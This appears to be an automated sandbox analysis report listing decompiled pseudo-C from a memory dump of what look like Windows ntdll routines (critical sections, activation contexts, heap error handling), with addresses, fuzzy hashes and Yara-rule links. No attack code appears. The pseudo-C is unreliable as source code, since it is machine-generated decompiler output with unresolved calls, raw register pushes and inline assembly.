                                                                                                            0x00b53613
                                                                                                            0x00b5361e
                                                                                                            0x00b53622
                                                                                                            0x00b53628
                                                                                                            0x00b5362f
                                                                                                            0x00b5362f
                                                                                                            0x00b53636
                                                                                                            0x00b53638
                                                                                                            0x00b5363b
                                                                                                            0x00b53642
                                                                                                            0x00b53642
                                                                                                            0x00b53636
                                                                                                            0x00b53657
                                                                                                            0x00b53657
                                                                                                            0x00b5365c
                                                                                                            0x00b53662
                                                                                                            0x00b53669
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryHash
                                                                                                            • API String ID: 0-2202222882
                                                                                                            • Opcode ID: cf0c44c00515f64bd46b8a34115f0557202cc850a3b1b1f0ae30b86f0bec39c4
                                                                                                            • Instruction ID: 8525b0783d58ac74441baeeebec4e25890594b326e92e1e12c7f49489441030f
                                                                                                            • Opcode Fuzzy Hash: cf0c44c00515f64bd46b8a34115f0557202cc850a3b1b1f0ae30b86f0bec39c4
                                                                                                            • Instruction Fuzzy Hash: 734163B2D0052DABDF219A50CC81FEEB7BCAB44754F4045E5BA09A7241DB709F88CF94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00BA05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00BA07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00B19730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00B9A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00B9A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00BA1293(_t79, _v40, E00BA07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00AF7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00B9138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                            0x00ba05c5
                                                                                                            0x00ba05ca
                                                                                                            0x00ba05d3
                                                                                                            0x00ba06db
                                                                                                            0x00ba06db
                                                                                                            0x00ba06dd
                                                                                                            0x00ba06e3
                                                                                                            0x00ba06e3
                                                                                                            0x00ba05dd
                                                                                                            0x00ba05e7
                                                                                                            0x00ba05f6
                                                                                                            0x00ba0600
                                                                                                            0x00ba0607
                                                                                                            0x00ba0610
                                                                                                            0x00ba0615
                                                                                                            0x00ba061a
                                                                                                            0x00ba061c
                                                                                                            0x00ba061e
                                                                                                            0x00ba0624
                                                                                                            0x00ba0625
                                                                                                            0x00ba0627
                                                                                                            0x00ba0628
                                                                                                            0x00ba0631
                                                                                                            0x00ba0640
                                                                                                            0x00ba064d
                                                                                                            0x00ba0654
                                                                                                            0x00ba0654
                                                                                                            0x00ba0631
                                                                                                            0x00ba066d
                                                                                                            0x00ba0674
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ba0692
                                                                                                            0x00ba069e
                                                                                                            0x00ba06b0
                                                                                                            0x00ba06a0
                                                                                                            0x00ba06a9
                                                                                                            0x00ba06a9
                                                                                                            0x00ba06b8
                                                                                                            0x00ba06d6
                                                                                                            0x00ba06d6
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: `
                                                                                                            • API String ID: 0-2679148245
                                                                                                            • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction ID: 7b2721e3971ea8918857d40b22e0411a679918550b8c53768a840d1c8d3ed2cf
                                                                                                            • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                            • Instruction Fuzzy Hash: 4A3122327183056BE720EE28CD85F9B77D9EBC5758F0442A8FA489B280D770ED14CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B53884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00B53884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00B19650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00AF4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00B19650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                                                            0x00b53893
                                                                                                            0x00b53896
                                                                                                            0x00b53899
                                                                                                            0x00b5389f
                                                                                                            0x00b538a0
                                                                                                            0x00b538a4
                                                                                                            0x00b538a9
                                                                                                            0x00b538ac
                                                                                                            0x00b538ad
                                                                                                            0x00b538ae
                                                                                                            0x00b538af
                                                                                                            0x00b538b1
                                                                                                            0x00b538b4
                                                                                                            0x00b538bb
                                                                                                            0x00b538bc
                                                                                                            0x00b538bd
                                                                                                            0x00b538c4
                                                                                                            0x00b538c8
                                                                                                            0x00b538ca
                                                                                                            0x00b538ca
                                                                                                            0x00b538d5
                                                                                                            0x00b5393e
                                                                                                            0x00b53940
                                                                                                            0x00b53942
                                                                                                            0x00b53952
                                                                                                            0x00b53954
                                                                                                            0x00b53961
                                                                                                            0x00b53961
                                                                                                            0x00b53967
                                                                                                            0x00b5396e
                                                                                                            0x00b5396e
                                                                                                            0x00b53947
                                                                                                            0x00b5394c
                                                                                                            0x00000000
                                                                                                            0x00b5394c
                                                                                                            0x00b538ea
                                                                                                            0x00b538ee
                                                                                                            0x00b538f8
                                                                                                            0x00b538f9
                                                                                                            0x00b538ff
                                                                                                            0x00b53900
                                                                                                            0x00b53902
                                                                                                            0x00b53903
                                                                                                            0x00b5390b
                                                                                                            0x00b5390f
                                                                                                            0x00b53950
                                                                                                            0x00000000
                                                                                                            0x00b53950
                                                                                                            0x00b53915
                                                                                                            0x00b5391d
                                                                                                            0x00b5391d
                                                                                                            0x00b53922
                                                                                                            0x00b53926
                                                                                                            0x00000000
                                                                                                            0x00b53928
                                                                                                            0x00b5392b
                                                                                                            0x00b5392b
                                                                                                            0x00b53935
                                                                                                            0x00b53937
                                                                                                            0x00b53937
                                                                                                            0x00000000
                                                                                                            0x00b53935
                                                                                                            0x00b53926
                                                                                                            0x00b538f0
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: BinaryName
                                                                                                            • API String ID: 0-215506332
                                                                                                            • Opcode ID: 6cc12003c52dda1058ed98a0e65bf5e5f75e7f4ab54659e48e7efd89b5b6fbe7
                                                                                                            • Instruction ID: d545d87d1e19a7d5ae5b12f0427051d54360c56671ef7fb1d65770f1e2eed936
                                                                                                            • Opcode Fuzzy Hash: 6cc12003c52dda1058ed98a0e65bf5e5f75e7f4ab54659e48e7efd89b5b6fbe7
                                                                                                            • Instruction Fuzzy Hash: F131E2B2900519AFDB15DA58C945EABF7F4EB80B60F1181E9BD06A7340D7709F48C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B0D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 33%
                                                                                                            			E00B0D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0xbcd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00AF4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00B1B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00B198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00B195D0();
					L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                            0x00b0d29c
                                                                                                            0x00b0d2a6
                                                                                                            0x00b0d2b1
                                                                                                            0x00b0d2b5
                                                                                                            0x00b0d2b6
                                                                                                            0x00b0d2bc
                                                                                                            0x00b0d2bd
                                                                                                            0x00b0d2be
                                                                                                            0x00b0d2bf
                                                                                                            0x00b0d2c2
                                                                                                            0x00b0d2c4
                                                                                                            0x00b0d2cc
                                                                                                            0x00b0d384
                                                                                                            0x00b0d34b
                                                                                                            0x00b0d34f
                                                                                                            0x00b0d350
                                                                                                            0x00b0d351
                                                                                                            0x00b0d35c
                                                                                                            0x00b0d35c
                                                                                                            0x00b0d2d6
                                                                                                            0x00b0d2da
                                                                                                            0x00b0d2e1
                                                                                                            0x00b0d361
                                                                                                            0x00b0d369
                                                                                                            0x00b0d36d
                                                                                                            0x00b0d2e3
                                                                                                            0x00b0d2e3
                                                                                                            0x00b0d2e3
                                                                                                            0x00b0d2e5
                                                                                                            0x00b0d2ed
                                                                                                            0x00b0d2f5
                                                                                                            0x00b0d2fa
                                                                                                            0x00b0d302
                                                                                                            0x00b0d303
                                                                                                            0x00b0d30b
                                                                                                            0x00b0d30f
                                                                                                            0x00b0d313
                                                                                                            0x00b0d318
                                                                                                            0x00b0d31c
                                                                                                            0x00b0d320
                                                                                                            0x00b0d379
                                                                                                            0x00b0d37d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b4affe
                                                                                                            0x00b4b001
                                                                                                            0x00b4b011
                                                                                                            0x00000000
                                                                                                            0x00b0d322
                                                                                                            0x00b0d322
                                                                                                            0x00b0d330
                                                                                                            0x00b0d337
                                                                                                            0x00b0d35d
                                                                                                            0x00b0d339
                                                                                                            0x00b0d33f
                                                                                                            0x00b0d38c
                                                                                                            0x00b0d38c
                                                                                                            0x00b0d33f
                                                                                                            0x00b0d349
                                                                                                            0x00000000
                                                                                                            0x00b0d349

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 1479b63e47c118322cb417861f07c5051cfd06a35839fba99d0eb7fee26bf9b6
                                                                                                            • Instruction ID: 57cf7ba218654561490a6e26d5087da7c4e77d3f5fb8c56d2f741938bec4018f
                                                                                                            • Opcode Fuzzy Hash: 1479b63e47c118322cb417861f07c5051cfd06a35839fba99d0eb7fee26bf9b6
                                                                                                            • Instruction Fuzzy Hash: 7831BFB15083059FC721DF68C981AABBFE8EB89754F50096EF994C3290D634DD04DB97
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AE1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00AE1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00B1BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00B1A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00B1A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00AF4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                            0x00ae1b8f
                                                                                                            0x00ae1b9a
                                                                                                            0x00ae1b9c
                                                                                                            0x00ae1b9e
                                                                                                            0x00ae1ba3
                                                                                                            0x00b37010
                                                                                                            0x00b37010
                                                                                                            0x00000000
                                                                                                            0x00ae1ba9
                                                                                                            0x00ae1ba9
                                                                                                            0x00ae1bae
                                                                                                            0x00000000
                                                                                                            0x00ae1bc5
                                                                                                            0x00ae1bca
                                                                                                            0x00ae1bcf
                                                                                                            0x00ae1bd0
                                                                                                            0x00ae1bd1
                                                                                                            0x00ae1bd2
                                                                                                            0x00ae1bd6
                                                                                                            0x00ae1bdc
                                                                                                            0x00ae1be0
                                                                                                            0x00b36ffc
                                                                                                            0x00b37000
                                                                                                            0x00000000
                                                                                                            0x00b37006
                                                                                                            0x00b37009
                                                                                                            0x00b37009
                                                                                                            0x00ae1be6
                                                                                                            0x00ae1bec
                                                                                                            0x00ae1c0b
                                                                                                            0x00ae1c0b
                                                                                                            0x00ae1c0c
                                                                                                            0x00ae1c11
                                                                                                            0x00ae1c12
                                                                                                            0x00ae1c15
                                                                                                            0x00ae1c1b
                                                                                                            0x00ae1c1f
                                                                                                            0x00ae1c31
                                                                                                            0x00ae1c33
                                                                                                            0x00b37026
                                                                                                            0x00b37026
                                                                                                            0x00ae1c21
                                                                                                            0x00ae1c24
                                                                                                            0x00ae1c24
                                                                                                            0x00ae1bee
                                                                                                            0x00ae1bee
                                                                                                            0x00ae1bf2
                                                                                                            0x00ae1c3a
                                                                                                            0x00ae1bf4
                                                                                                            0x00ae1bf4
                                                                                                            0x00ae1c05
                                                                                                            0x00ae1c05
                                                                                                            0x00ae1c09
                                                                                                            0x00ae1c3e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae1c09
                                                                                                            0x00ae1bec
                                                                                                            0x00ae1be0
                                                                                                            0x00ae1bae
                                                                                                            0x00ae1c2e

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: WindowsExcludedProcs
                                                                                                            • API String ID: 0-3583428290
                                                                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction ID: 0ead71ce506b990392858e634f224399694482ae1eb78ac8da92bfa7d6f49843
                                                                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                            • Instruction Fuzzy Hash: 2D21F576581678ABCB319B5AC940FABB7BDEF85750F3544A5F904DB200DA34DD00D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AFF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00AFF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                            0x00aff71d
                                                                                                            0x00aff722
                                                                                                            0x00aff726
                                                                                                            0x00b44770
                                                                                                            0x00aff765
                                                                                                            0x00aff769
                                                                                                            0x00aff769
                                                                                                            0x00aff732
                                                                                                            0x00b4477a
                                                                                                            0x00000000
                                                                                                            0x00b4477a
                                                                                                            0x00aff738
                                                                                                            0x00aff73a
                                                                                                            0x00aff73c
                                                                                                            0x00aff73f
                                                                                                            0x00aff746
                                                                                                            0x00aff778
                                                                                                            0x00aff7a9
                                                                                                            0x00aff7a9
                                                                                                            0x00aff754
                                                                                                            0x00aff75a
                                                                                                            0x00aff75d
                                                                                                            0x00aff75f
                                                                                                            0x00aff761
                                                                                                            0x00aff76f
                                                                                                            0x00aff771
                                                                                                            0x00aff771
                                                                                                            0x00aff76f
                                                                                                            0x00aff763
                                                                                                            0x00000000
                                                                                                            0x00aff763
                                                                                                            0x00aff77d
                                                                                                            0x00aff7a3
                                                                                                            0x00aff7a5
                                                                                                            0x00000000
                                                                                                            0x00aff7a5
                                                                                                            0x00aff77f
                                                                                                            0x00aff782
                                                                                                            0x00aff784
                                                                                                            0x00aff786
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00aff788
                                                                                                            0x00aff748
                                                                                                            0x00aff74d
                                                                                                            0x00aff78d
                                                                                                            0x00aff793
                                                                                                            0x00aff7b7
                                                                                                            0x00aff7bc
                                                                                                            0x00000000
                                                                                                            0x00aff7bc
                                                                                                            0x00aff798
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00aff79d
                                                                                                            0x00aff7b0
                                                                                                            0x00000000
                                                                                                            0x00aff7b0
                                                                                                            0x00aff79f
                                                                                                            0x00000000
                                                                                                            0x00aff74f
                                                                                                            0x00aff74f
                                                                                                            0x00000000
                                                                                                            0x00aff74f

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Actx
                                                                                                            • API String ID: 0-89312691
                                                                                                            • Opcode ID: 3c6f866712219105d9acb787833062bddbadf071d76f9d76a8e1ab518c5f77ff
                                                                                                            • Instruction ID: f2ac0dd342b653f3d4d0a2498f8b4b2d1be7e1e5b7cf3d6e81a3f8ec2e9b337b
                                                                                                            • Opcode Fuzzy Hash: 3c6f866712219105d9acb787833062bddbadf071d76f9d76a8e1ab518c5f77ff
                                                                                                            • Instruction Fuzzy Hash: CA11D03570460A8FEB246F9D8890736F2A5EF95724F38453AF661DB3A1DB70DC019340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B88DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00B88DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xbb0d50);
				E00B2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00B65720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00B2DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00B2DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00B2D130(_t34, _t39, _t40);
			}





                                                                                                            0x00b88df1
                                                                                                            0x00b88df1
                                                                                                            0x00b88df1
                                                                                                            0x00b88df1
                                                                                                            0x00b88df1
                                                                                                            0x00b88df1
                                                                                                            0x00b88df3
                                                                                                            0x00b88df8
                                                                                                            0x00b88dfd
                                                                                                            0x00b88e00
                                                                                                            0x00b88e0e
                                                                                                            0x00b88e2a
                                                                                                            0x00b88e36
                                                                                                            0x00b88e38
                                                                                                            0x00b88e3c
                                                                                                            0x00b88e46
                                                                                                            0x00b88e46
                                                                                                            0x00b88e36
                                                                                                            0x00b88e50
                                                                                                            0x00b88e56
                                                                                                            0x00b88e59
                                                                                                            0x00b88e5c
                                                                                                            0x00b88e60
                                                                                                            0x00b88e67
                                                                                                            0x00b88e6d
                                                                                                            0x00b88e73
                                                                                                            0x00b88e74
                                                                                                            0x00b88eb1
                                                                                                            0x00b88ebd

                                                                                                            Strings
                                                                                                            • Critical error detected %lx, xrefs: 00B88E21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Critical error detected %lx
                                                                                                            • API String ID: 0-802127002
                                                                                                            • Opcode ID: 3b2dd82833051d7719036848ccd98c92bf37c78cc808a6bf13f6968c1b8d2e18
                                                                                                            • Instruction ID: 60dec104e8585c86d5231328c631854daef45389add22a5a76d7a1eb56cae7f4
                                                                                                            • Opcode Fuzzy Hash: 3b2dd82833051d7719036848ccd98c92bf37c78cc808a6bf13f6968c1b8d2e18
                                                                                                            • Instruction Fuzzy Hash: 93113971D14748DBDF24EFA495067ADBBF0BB04315F2042ADE469AB2A2C7744A02CF14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00B6FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00B6FF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                            • API String ID: 0-1911121157
                                                                                                            • Opcode ID: 4d15c663c136de04f85b5adf1632c43089c905956368fc394f3a99062d629efa
                                                                                                            • Instruction ID: b96b53222f371db97e4058f54683f60e7b6f282eefa62bd3d5999e2080314602
                                                                                                            • Opcode Fuzzy Hash: 4d15c663c136de04f85b5adf1632c43089c905956368fc394f3a99062d629efa
                                                                                                            • Instruction Fuzzy Hash: 9A11AD72951584EFDB22EB50D94AFA8BBF1FB08704F1484A4F1096B6A2CB7D9990CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00BA5BA5, Relevance: .6, Instructions: 592COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
